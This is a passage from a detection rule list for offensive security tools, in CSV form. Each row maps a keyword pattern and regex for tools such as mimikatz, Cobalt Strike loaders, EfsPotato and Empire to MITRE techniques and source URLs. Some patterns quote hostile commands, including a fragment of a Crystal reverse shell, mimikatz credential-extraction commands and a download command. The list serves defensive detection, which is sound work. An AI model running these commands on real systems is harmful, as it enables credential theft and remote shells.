*.txt*",".{0,1000}crunch\s.{0,1000}\s\-o\s.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","crunch","Generate a dictionary file containing words with a minimum and maximum length","T1596 - T1596.001","TA0043","N/A","N/A","Credential Access","https://sourceforge.net/projects/crunch-wordlist/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*crunch 4 7 abcdefghijklmnopqrstuvwxyz1234567890 -o wordlist.txt*",".{0,1000}crunch\s4\s7\sabcdefghijklmnopqrstuvwxyz1234567890\s\-o\swordlist\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*crypt0p3g/bof-collection*",".{0,1000}crypt0p3g\/bof\-collection.{0,1000}","offensive_tool_keyword","bof-collection","Collection of Beacon Object Files 
(BOF) for Cobalt Strike","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/crypt0p3g/bof-collection","1","1","N/A","N/A","10","169","25","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z" "*crypto::capi*",".{0,1000}crypto\:\:capi.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*crypto::certificates*",".{0,1000}crypto\:\:certificates.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*crypto::certtohw*",".{0,1000}crypto\:\:certtohw.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*crypto::cng*",".{0,1000}crypto\:\:cng.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*crypto::extract*",".{0,1000}crypto\:\:extract.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*crypto::hash*",".{0,1000}crypto\:\:hash.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*crypto::keys*",".{0,1000}crypto\:\:keys.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*crypto::providers*",".{0,1000}crypto\:\:providers.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*crypto::sc*",".{0,1000}crypto\:\:sc.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*crypto::scauth*",".{0,1000}crypto\:\:scauth.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*crypto::stores*",".{0,1000}crypto\:\:stores.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*crypto::system*",".{0,1000}crypto\:\:system.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. 
keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*crypto::tpminfo*",".{0,1000}crypto\:\:tpminfo.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","1","N/A","10","10","18741","3563","2024-01-05T09:06:47Z","2014-04-06T18:30:02Z" "*crypto_identifier*",".{0,1000}crypto_identifier.{0,1000}","offensive_tool_keyword","crypto_identifier","Crypto tool for pentest and ctf : try to uncipher data using multiple algorithms and block chaining modes. 
Useful for a quick check on unknown cipher text and key dictionary","T1573 - T1558 - T1112","TA0001","N/A","N/A","Exploitation tools","https://github.com/Acceis/crypto_identifier","1","1","N/A","N/A","2","121","24","2018-01-04T11:04:56Z","2017-11-30T13:04:49Z" "*CryptUnprotectData(*",".{0,1000}CryptUnprotectData\(.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","10","1","89","61","2024-05-01T19:07:16Z","2022-11-20T19:11:00Z" "*cryptvortex *",".{0,1000}cryptvortex\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*crystal eval 'require ""process"";require ""socket"";*Socket.tcp*connect*Process.new*output.gets_to_end*",".{0,1000}crystal\seval\s\'require\s\""process\""\;require\s\""socket\""\;.{0,1000}Socket\.tcp.{0,1000}connect.{0,1000}Process\.new.{0,1000}output\.gets_to_end.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*cs2modrewrite.py*",".{0,1000}cs2modrewrite\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - 
T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","10","10","570","110","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" "*cs2nginx.py*",".{0,1000}cs2nginx\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat 
Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","10","10","570","110","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" "*csandker/Azure-AccessPermissions*",".{0,1000}csandker\/Azure\-AccessPermissions.{0,1000}","offensive_tool_keyword","Azure-AccessPermissions","Easy to use PowerShell script to enumerate access permissions in an Azure Active Directory environment.","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/csandker/Azure-AccessPermissions","1","1","AD Enumeration","6","2","103","18","2023-02-21T06:46:24Z","2022-10-19T10:33:24Z" "*CS-Avoid-killing*",".{0,1000}CS\-Avoid\-killing.{0,1000}","offensive_tool_keyword","cobaltstrike","CS anti-killing including python version and C version","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","786","145","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" "*CS-BOFs/lsass*",".{0,1000}CS\-BOFs\/lsass.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","99","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" "*csc.exe /t:exe /out:RandomName.exe Program.cs*",".{0,1000}csc\.exe\s\/t\:exe\s\/out\:RandomName\.exe\sProgram\.cs.{0,1000}","offensive_tool_keyword","NetLoader","Loads any C# binary in memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","0","N/A","10","8","759","138","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z" "*csc.exe EfsPotato.cs *",".{0,1000}csc\.exe\sEfsPotato\.cs\s.{0,1000}","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with 
SeImpersonatePrivilege local privilege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","10","7","674","118","2023-12-14T14:30:15Z","2021-07-26T21:36:16Z" "*CScrandle_fileless.cs*",".{0,1000}CScrandle_fileless\.cs.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*cscript *wmi.vbs -h*",".{0,1000}cscript\s.{0,1000}wmi\.vbs\s\-h.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation 
tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*cscript ..\\temp.vbs*",".{0,1000}cscript\s\.\.\\\\temp\.vbs.{0,1000}","offensive_tool_keyword","365-Stealer","365-Stealer is a phishing simulation tool written in python3. It can be used to execute Illicit Consent Grant Attack","T1111 - T1566.001 - T1078.004","TA0004 - TA0001 - TA0040","N/A","N/A","Phishing","https://github.com/AlteredSecurity/365-Stealer","1","0","N/A","10","4","386","82","2023-06-15T19:56:12Z","2020-09-20T18:22:36Z" "*cscript dl.vbs *http*/*.zip*.zip*",".{0,1000}cscript\sdl\.vbs\s.{0,1000}http.{0,1000}\/.{0,1000}\.zip.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","Windows-Privilege-Escalation","Windows Privilege Escalation Techniques and Scripts","T1055 - T1548 - T1078","TA0004 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/frizb/Windows-Privilege-Escalation","1","0","N/A","N/A","8","736","180","2020-03-25T22:35:02Z","2017-05-12T13:09:50Z" "*CsEnox/SeManageVolumeExploit*",".{0,1000}CsEnox\/SeManageVolumeExploit.{0,1000}","offensive_tool_keyword","SeManageVolumeExploit","This exploit grants full permission on C:\ drive for all users on the machine","T1046 - T1098 - T1222.002","TA0007 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/CsEnox/SeManageVolumeExploit","1","1","N/A","10","1","65","15","2023-05-29T05:41:16Z","2021-10-11T01:17:04Z" "*csexec/csexec_history*",".{0,1000}csexec\/csexec_history.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","private github repo","10","N/A","N/A","N/A","N/A","N/A" 
"*csharp_inject_bof_inject*",".{0,1000}csharp_inject_bof_inject.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "*CSharpNamedPipeLoader*",".{0,1000}CSharpNamedPipeLoader.{0,1000}","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless Lateral Movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - 
T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","10","10","321","46","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z" "*csload.net/*/muma.*",".{0,1000}csload\.net\/.{0,1000}\/muma\..{0,1000}","offensive_tool_keyword","cobaltstrike","A cobaltstrike shellcode loader - past domestic mainstream antivirus software","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - 